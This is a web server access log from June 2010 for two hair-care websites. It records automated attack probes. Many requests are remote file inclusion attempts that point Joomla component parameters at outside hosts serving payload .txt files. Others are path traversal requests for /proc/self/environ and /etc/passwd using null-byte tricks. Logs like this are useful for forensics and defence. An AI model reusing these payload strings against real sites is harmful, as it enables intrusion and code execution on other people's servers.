216.59.0.167 - - [14/Jun/2010:07:50:19 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.59.0.167 - - [14/Jun/2010:07:50:20 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.59.0.167 - - [14/Jun/2010:07:53:10 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.59.0.167 - - [14/Jun/2010:07:53:10 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.59.0.167 - - [14/Jun/2010:07:53:10 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.120.226.47 - - [14/Jun/2010:07:53:15 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
216.59.0.167 - - [14/Jun/2010:07:54:01 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.59.0.167 - - [14/Jun/2010:07:54:01 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.59.0.167 - - [14/Jun/2010:07:54:05 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.66.250 - - [14/Jun/2010:07:54:34 -0700] "GET /logs/access.log/?sourcedir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.66.250 - - [14/Jun/2010:07:54:34 -0700] "GET /?sourcedir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.66.250 - - [14/Jun/2010:07:54:34 -0700] "GET /logs/?sourcedir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 200 5943 "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.6.90 - - [14/Jun/2010:07:54:55 -0700] "GET /logs/access_091123.log//bbs//skin/sirini_ezset_fullpack/setup.php?dir=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.46.45.204 - - [14/Jun/2010:07:55:05 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.actualtv.ro/txtsql/data/a.jpg HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
174.46.45.204 - - [14/Jun/2010:07:55:07 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.actualtv.ro/txtsql/data/a.jpg HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
91.212.226.240 - - [14/Jun/2010:07:55:15 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]" "freehairsecrets.com"
91.212.226.240 - - [14/Jun/2010:07:55:15 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]" "freehairsecrets.com"
121.88.4.141 - - [14/Jun/2010:07:56:19 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
121.88.4.141 - - [14/Jun/2010:07:56:20 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
121.88.4.141 - - [14/Jun/2010:07:56:21 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
69.175.6.90 - - [14/Jun/2010:07:56:29 -0700] "GET /logs/access_091123.log//bbs//skin/sirini_ezset_fullpack/setup.php?dir=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.120.226.47 - - [14/Jun/2010:07:57:17 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
58.120.226.47 - - [14/Jun/2010:07:57:17 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
58.120.226.47 - - [14/Jun/2010:07:57:18 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
193.47.80.39 - - [14/Jun/2010:08:01:15 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "freehairsecrets.com"
193.47.80.39 - - [14/Jun/2010:08:01:15 -0700] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "freehairsecrets.com"
91.142.209.202 - - [14/Jun/2010:08:02:27 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.46.45.204 - - [14/Jun/2010:08:03:12 -0700] "GET /logs/access_100510.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.actualtv.ro/txtsql/data/a.jpg HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
174.46.45.204 - - [14/Jun/2010:08:03:12 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.actualtv.ro/txtsql/data/a.jpg HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
174.46.45.204 - - [14/Jun/2010:08:03:12 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.actualtv.ro/txtsql/data/a.jpg HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
64.118.87.45 - - [14/Jun/2010:08:05:48 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.118.87.45 - - [14/Jun/2010:08:05:48 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.118.87.45 - - [14/Jun/2010:08:05:49 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.118.87.45 - - [14/Jun/2010:08:05:55 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.118.87.45 - - [14/Jun/2010:08:05:55 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.118.87.45 - - [14/Jun/2010:08:05:55 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.118.87.45 - - [14/Jun/2010:08:06:04 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.118.87.45 - - [14/Jun/2010:08:06:04 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.118.87.45 - - [14/Jun/2010:08:06:04 -0700] "GET /logs/scripts.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.163.180.32 - - [14/Jun/2010:08:06:05 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
64.118.87.45 - - [14/Jun/2010:08:06:07 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.118.87.45 - - [14/Jun/2010:08:06:07 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.118.87.45 - - [14/Jun/2010:08:06:07 -0700] "GET /logs/scripts.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.165.193.158 - - [14/Jun/2010:08:06:17 -0700] "GET /logs/access.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.165.193.158 - - [14/Jun/2010:08:06:17 -0700] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.165.193.158 - - [14/Jun/2010:08:06:17 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.163.180.32 - - [14/Jun/2010:08:06:27 -0700] "GET /logs/access_100510.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
69.163.180.32 - - [14/Jun/2010:08:06:27 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
69.163.180.32 - - [14/Jun/2010:08:06:27 -0700] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
69.163.180.32 - - [14/Jun/2010:08:06:32 -0700] "GET /logs/access.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
87.106.183.116 - - [14/Jun/2010:08:09:47 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.211.149.167 - - [14/Jun/2010:08:09:59 -0700] "GET /logs/access_100222.log//main.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
203.211.149.167 - - [14/Jun/2010:08:10:00 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
203.211.149.167 - - [14/Jun/2010:08:10:01 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
219.255.132.83 - - [14/Jun/2010:08:11:20 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.211.129.97 - - [14/Jun/2010:08:11:54 -0700] "GET /logs/access_100222.log//main.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
203.211.129.97 - - [14/Jun/2010:08:11:54 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
203.211.129.97 - - [14/Jun/2010:08:11:55 -0700] "GET /logs/access_100222.log//main.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
203.211.129.97 - - [14/Jun/2010:08:11:55 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
203.211.129.97 - - [14/Jun/2010:08:11:55 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
203.211.129.97 - - [14/Jun/2010:08:11:56 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
219.255.132.83 - - [14/Jun/2010:08:13:42 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
200.107.235.174 - - [14/Jun/2010:08:17:20 -0700] "GET /logs/access_091207.log HTTP/1.1" 200 748461 "http://www.google.hn/search?q=A237UCHG1&hl=es&start=30&sa=N" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.2)" "www.freehairsecrets.com"
211.239.121.168 - - [14/Jun/2010:08:18:14 -0700] "GET /?sourcedir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
211.239.121.168 - - [14/Jun/2010:08:18:14 -0700] "GET /logs/access.log/?sourcedir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.239.121.168 - - [14/Jun/2010:08:18:14 -0700] "GET /logs/?sourcedir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 200 5943 "-" "Mozilla/5.0" "growlonghairfast.com"
64.57.240.235 - - [14/Jun/2010:08:18:34 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
64.57.240.235 - - [14/Jun/2010:08:18:34 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
64.57.240.235 - - [14/Jun/2010:08:18:34 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.46.45.204 - - [14/Jun/2010:08:20:00 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.actualtv.ro/txtsql/data/a.jpg HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
174.46.45.204 - - [14/Jun/2010:08:20:00 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.actualtv.ro/txtsql/data/a.jpg HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
174.46.45.204 - - [14/Jun/2010:08:20:00 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.actualtv.ro/txtsql/data/a.jpg HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
91.142.209.202 - - [14/Jun/2010:08:23:26 -0700] "GET /logs/access_100222.log//main.php?sayfa=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
91.142.209.202 - - [14/Jun/2010:08:23:26 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
91.142.209.202 - - [14/Jun/2010:08:23:27 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
219.255.132.83 - - [14/Jun/2010:08:23:28 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
219.255.132.83 - - [14/Jun/2010:08:23:29 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
219.255.132.83 - - [14/Jun/2010:08:23:29 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.175.6.90 - - [14/Jun/2010:08:25:44 -0700] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.6.90 - - [14/Jun/2010:08:25:44 -0700] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.6.90 - - [14/Jun/2010:08:25:44 -0700] "GET /logs/access_100510.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.6.90 - - [14/Jun/2010:08:26:03 -0700] "GET /logs/access_100510.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.6.90 - - [14/Jun/2010:08:26:29 -0700] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.6.90 - - [14/Jun/2010:08:26:29 -0700] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.6.90 - - [14/Jun/2010:08:26:29 -0700] "GET /logs/access_100510.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.6.90 - - [14/Jun/2010:08:26:53 -0700] "GET /logs/access_100510.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.183.116 - - [14/Jun/2010:08:29:07 -0700] "GET /logs/access.log/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.106.183.116 - - [14/Jun/2010:08:29:07 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.106.183.116 - - [14/Jun/2010:08:29:08 -0700] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
219.255.132.83 - - [14/Jun/2010:08:33:39 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
219.255.132.83 - - [14/Jun/2010:08:33:40 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
219.255.132.83 - - [14/Jun/2010:08:33:41 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.229.90.201 - - [14/Jun/2010:08:34:09 -0700] "GET /logs/access_100322.log//index.php?option=com_virtuemart&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.229.90.201 - - [14/Jun/2010:08:34:09 -0700] "GET /index.php?option=com_virtuemart&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.229.90.201 - - [14/Jun/2010:08:34:09 -0700] "GET /logs//index.php?option=com_virtuemart&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [14/Jun/2010:08:35:14 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [14/Jun/2010:08:35:19 -0700] "GET /logs/access_100412.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [14/Jun/2010:08:35:19 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [14/Jun/2010:08:36:13 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [14/Jun/2010:08:36:17 -0700] "GET /logs/access_100412.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [14/Jun/2010:08:36:17 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.165.193.158 - - [14/Jun/2010:08:39:08 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.165.193.158 - - [14/Jun/2010:08:39:08 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.165.193.158 - - [14/Jun/2010:08:39:08 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.165.193.158 - - [14/Jun/2010:08:39:29 -0700] "GET /logs/access_100412.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.165.193.158 - - [14/Jun/2010:08:39:29 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.165.193.158 - - [14/Jun/2010:08:39:29 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [14/Jun/2010:08:39:51 -0700] "GET /logs/access_100412.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [14/Jun/2010:08:39:51 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [14/Jun/2010:08:39:55 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [14/Jun/2010:08:40:19 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [14/Jun/2010:08:40:20 -0700] "GET /logs/access_100412.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [14/Jun/2010:08:40:22 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.153.27.146 - - [14/Jun/2010:08:41:52 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
85.153.27.146 - - [14/Jun/2010:08:41:52 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
85.153.27.146 - - [14/Jun/2010:08:41:52 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
85.153.27.146 - - [14/Jun/2010:08:42:16 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.153.27.146 - - [14/Jun/2010:08:42:16 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.153.27.146 - - [14/Jun/2010:08:42:16 -0700] "GET /logs/access_100412.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
